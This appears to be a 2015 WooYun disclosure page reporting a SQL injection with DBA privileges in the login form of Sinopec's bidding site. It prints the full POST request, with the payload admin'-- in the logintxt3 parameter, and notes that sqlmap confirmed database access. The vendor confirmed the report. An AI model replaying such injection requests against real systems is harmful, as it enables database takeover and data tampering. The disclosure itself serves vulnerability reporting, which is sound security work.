当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157223

漏洞标题:中石化某重要站点存在DBA权限注入漏洞

相关厂商:中国石油化工股份有限公司

漏洞作者: 眼镜蛇

提交时间:2015-12-01 10:07

修复时间:2016-01-15 14:10

公开时间:2016-01-15 14:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-01: 细节已通知厂商并且等待厂商处理中
2015-12-01: 厂商已经确认,细节仅向厂商公开
2015-12-11: 细节向核心白帽子及相关领域专家公开
2015-12-21: 细节向普通白帽子公开
2015-12-31: 细节向实习白帽子公开
2016-01-15: 细节向公众公开

简要描述:

中石化某重要站点存在DBA权限注入漏洞

详细说明:

该站点用来发布招标公告、预审公告、评标结果公示、招标结果公告等重要信息。
如果信息被恶意篡改将会导致严重后果。
经测试发现该站整站部署的有WEB防火墙,但是貌似在登录处没有进行检查,存在一处DBA权限的注入漏洞,数据库为mssql ,可导致服务器被控制。

POST /tppingbiao/RegionIndividuation/DQZGSHWZ/login.aspx HTTP/1.1
Content-Length: 545
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://bidding.sinopec.com
Cookie: DZSW=DZSW_NLB_129; ASP.NET_SessionId=oskmaq1zcogwbey3q3m0jpl1;
__CSRFCOOKIE=7690d989-ae4c-4282-a4ed-0ffe3af85633;
__AntiXsrfToken=d9befea5aff6483c946ee39cbfb38b9e
Host: bidding.sinopec.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
loginbtn31=&logintxt=qwpnmqcu&logintxt1=qwpnmqcu&logintxt2=qwpnmqcu&logintxt3=admin'--
&loginType=qwpnmqcu&pwdtxt=1&pwdtxt1=1&pwdtxt2=1&pwdtxt3=1&usbkeycode=94102&__EVENTVALIDATIO
N=/wEdAAqWDHmIJ4aFyI8dVTq6n/HyiJgWenL0rUwQqwyhbdmXEU9555LsOKmbo20Gjd72uFy35ustPU4va/lAty0w%
2b3p%2bNwI%
2bChDlEtW2wy9Psy/hDF/W4JYZOlexbbrzNDq/8oqlMlYRK3fkPlgOTZpABvGhNtIDCtHWD8BGkj0LMEiyE2CD2Y/ZSB
EA1y6cTIccSaKgHWxeGMVV9FZeLIVAhNhI/I4maqTe1Fs1vb7BpfYdu%2b4Xsak%
3d&__VIEWSTATE=/wEPDwUJMzAyMTMyOTE2ZGRVUtZGza2zPhvWfoaK3sxSDw8wEA%3d%3d


参数logintxt3存在注入漏洞

漏洞证明:

SQLMAP检测结果如下:

1.jpg


DBA权限:

2.png


列举数据库信息:

3.jpg


仅作证明,不继续深入,希望加以修复!

修复方案:

过滤

版权声明:转载请注明来源 眼镜蛇@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-12-01 14:09

厂商回复:

谢谢!我们将尽快修改。

最新状态:

暂无